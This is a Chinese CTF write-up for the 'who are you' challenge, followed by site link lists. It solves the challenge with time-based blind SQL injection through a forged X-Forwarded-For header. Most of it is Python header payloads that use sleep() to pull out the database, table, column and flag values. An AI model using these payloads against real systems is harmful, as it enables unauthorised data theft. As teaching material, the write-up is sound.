实验吧-who are you解题(时间盲注)
打开连接,展现内容以下所示:python
分析:首先想到这多是要伪造ip的题目,而后利用伪造IP的HTTP头(例如:X-Forwarded-For等)。burp中成功进行伪造,以下图所示:web
响应结果:sql
发现能够成功进行伪造,可是这些sql语句好像字符串化了,看起来并不具备判断性,接下来怎么办呢?数据库
时间型的盲注?!code
利用select case when() then end语句,根据响应时间的差别判断数据库长度,数据库表名,列名等,盲注语句以下所示:orm
# length of database
# header = {"X-Forwarded-For":"'+(select case when(select(length(database()))>%s) then 0 else sleep(6) end) and 'a'='a" % i}
# name of database
# header = {"X-Forwarded-For": "'+(select case when (substring((select database()) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i,j)}
# length of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';') from information_schema.tables where table_schema='web4') from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of table
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(table_name separator ';')"
# " from information_schema.tables where table_schema='web4') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
# i, j)}
# length of column
# header = {
# "X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';') "
# "from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='') "
# "then sleep(6) else 0 end) and 'a'='a" % i}
# name of column
# header = {"X-Forwarded-For": "'+(select case when(substring((select group_concat(column_name separator ';')"
# " from information_schema.columns where table_schema='web4' and table_name='flag') from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (
# i, j)}
# length of flag
# header = {
# "X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
# "from flag) from %s for 1)='') then sleep(6) else 0 end) and 'a'='a" % i}
# name of flag
header = {
"X-Forwarded-For": "'+(select case when(substring((select group_concat(flag separator ';') "
"from flag) from %s for 1)='%s') then sleep(6) else 0 end) and 'a'='a" % (i, j)}
结果以下:blog
相关文章
- 1. CTF writeup -who are you?
- 2. who are you?(i春秋)
- 3. i春秋 WEB who are you?
- 4. i春秋 who are you
- 5. 时间盲注
- 6. I love you not because of who you are, but because of who I am when I am with you.
- 7. Mysql时间盲注
- 8. git中提示 please tell me who you are
- 9. [CTF]No.0006 [强网杯] Who are you
- 10. SQL注入---时间盲注
- 更多相关文章...
- • SQLite 日期 & 时间 - SQLite教程
- • PHP 实例 - AJAX 实时搜索 - PHP教程
- • Spring Cloud 微服务实战(三) - 服务注册与发现
- • PHP Ajax 跨域问题最佳解决方案
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Window下Ribbit MQ安装
- 2. Linux下Redis安装及集群搭建
- 3. shiny搭建网站填坑战略
- 4. Mysql8.0.22安装与配置详细教程
- 5. Hadoop安装及配置
- 6. Python爬虫初学笔记
- 7. 部署LVS-Keepalived高可用集群
- 8. keepalived+mysql高可用集群
- 9. jenkins 公钥配置
- 10. HA实用详解
欢迎关注本站公众号,获取更多信息
相关文章